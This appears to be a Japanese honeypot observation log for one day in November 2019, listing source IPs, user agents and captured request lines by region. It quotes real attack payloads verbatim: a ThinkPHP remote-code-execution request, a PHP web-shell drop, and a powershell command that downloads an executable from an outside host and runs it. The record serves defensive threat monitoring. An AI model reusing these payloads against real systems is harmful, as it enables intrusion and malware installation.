ハニーポット(仮) 観測記録 2019/11/15分です。

特徴

Region：AP

Shenzhen TVT製品の脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
18[.]179[.]20[.]5に関する不正通信
を確認しました。

Region：US

HiSilicon DVR Devicesの脆弱性を狙うアクセス
5[.]188[.]210[.]101に関する不正通信
を確認しました。

Region：EU

Shenzhen TVT製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
ZmEuによるスキャン行為
123[.]125[.]114に関する不正通信
を確認しました。

ThinkPHPを狙うアクセスで以下のような動きを確認しました。

cmd.exe /c powershell (new-object System.Net.WebClient)
.DownloadFile('http://fk.0xbdairolkoie.space/download.exe','%SystemRoot%/Temp/okucynwxnwjlghw28108.exe');
start %SystemRoot%/Temp/okucynwxnwjlghw28108.exe

他

アクセス数推移

AP：総アクセス数：43 (前日比：-15)
US：総アクセス数：5 (前日比：-20)
EU：総アクセス数：36 (前日比：+27)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Region：AP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	118.150.145.102	Taiwan
1	175.176.194.10	China
1	218.108.29.194	China
1	223.255.127.75	China
34	44.224.22.196	United States
4	80.82.77.139	Netherlands
1	89.248.169.17	Netherlands

UserAgent一覧

件数	UserAgent
23	-
1	ApiTool
14	AWS Security Scanner
1	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)
1	Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
1	Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
1	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1	python-requests/2.13.0

リクエスト内容一覧

件数	Method	Request	Protocol
10	CONNECT	18[.]179[.]20[.]5:80	HTTP/1.0
1	GET	/favicon.ico	HTTP/1.1
2	GET	http://169[.]254[.]169[.]254/	HTTP/1.1
2	GET	http://169[.]254[.]169[.]254/latest/dynamic/instance-identity/document	HTTP/1.1
2	GET	http://example[.]com/	HTTP/1.1
2	GET	http://[::ffff:a9fe:a9fe]/	HTTP/1.1
2	GET	http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document	HTTP/1.1
4	GET	/latest/dynamic/instance-identity/document	HTTP/1.1
1	GET	/LoginPage.do	HTTP/1.1
1	GET	/phpmyadmin	HTTP/1.1
1	GET	/robots.txt	HTTP/1.1
1	GET	/sitemap.xml	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
1	GET	/.well-known/security.txt	HTTP/1.1
1	POST	/editBlackAndWhiteList	HTTP/1.1
1	POST	/Login.htm	HTTP/1.0
10	\x16\x03\x01

Region:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	118.140.64.36	Hong Kong
1	14.177.154.212	Vietnam
1	45.33.5.240	United States
1	5.188.210.101	Russia
1	89.248.169.17	Netherlands

UserAgent一覧

件数	UserAgent
2	-
1	Mozilla/5.0
1	Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
1	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36

リクエスト内容一覧

件数	Method	Request	Protocol
1
1	GET	http://5[.]188[.]210[.]101/echo.php	HTTP/1.1
1	GET	../../mnt/custom/ProductDefinition	HTTP
1	GET	/webdav/	HTTP/1.1
1	POST	/Login.htm	HTTP/1.0

Region:EU

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	111.224.7.67	China
1	116.53.230.170	China
1	121.204.144.165	China
1	121.57.225.227	China
5	132.145.49.115	United States
1	175.43.16.203	China
1	178.27.185.94	Germany
1	180.95.231.141	China
1	185.128.41.50	Switzerland
1	223.166.74.184	China
1	223.166.74.24	China
8	39.135.1.194	China
1	45.20.22.246	United States
1	45.33.5.240	United States
6	58.210.85.22	China
1	59.9.16.131	South Korea
1	60.13.6.110	China
1	61.159.238.111	China
2	89.248.169.17	Netherlands

UserAgent一覧

件数	UserAgent
3	-
2	ApiTool
1	Java/1.8.0_131
5	Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
1	Mozilla/5.01688858 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36
1	Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
4	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
2	Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
8	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
3	PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
6	ZmEu

リクエスト内容一覧

件数	Method	Request	Protocol
1
1	CONNECT	cn[.]bing[.]com:443	HTTP/1.1
1	CONNECT	www[.]baidu[.]com:443	HTTP/1.1
1	CONNECT	www[.]ip[.]cn:443	HTTP/1.1
1	GET	/elrekt[.]php	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
1	GET	http://www[.]123cha[.]com/	HTTP/1.1
1	GET	http://www[.]epochtimes[.]com/	HTTP/1.1
1	GET	http://www[.]rfa[.]org/english/	HTTP/1.1
1	GET	http://www[.]wujieliulan[.]com/	HTTP/1.1
3	GET	/index.php	HTTP/1.1
2	GET	/manager/html	HTTP/1.1
1	GET	/myadmin/scripts/setup.php	HTTP/1.1
1	GET	/MyAdmin/scripts/setup.php	HTTP/1.1
1	GET	/phpmyadmin/scripts/setup.php	HTTP/1.1
1	GET	/phpMyAdmin/scripts/setup.php	HTTP/1.1
1	GET	/pma/scripts/setup.php	HTTP/1.1
1	GET	/public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fk.0xbdairolkoie.space/download.exe','%SystemRoot%/Temp/okucynwxnwjlghw28108.exe');start%20%SystemRoot%/Temp/okucynwxnwjlghw28108.exe	HTTP/1.1
1	GET	/public/index.php	HTTP/1.1
1	GET	/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fk.0xbdairolkoie.space/download.exe','%SystemRoot%/Temp/okucynwxnwjlghw28108.exe');start%20%SystemRoot%/Temp/okucynwxnwjlghw28108.exe	HTTP/1.1
1	GET	/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	GET	/TP/html/public/index.php	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
1	GET	/v1/agent/self	HTTP/1.1
1	GET	/w00tw00t.at.blackhats.romanian.anti-sec:)	HTTP/1.1
1	HEAD	http://123[.]125[.]114[.]144/	HTTP/1.1
2	POST	/editBlackAndWhiteList	HTTP/1.1
2	POST	/Login.htm	HTTP/1.0
1	\x16\x03\x01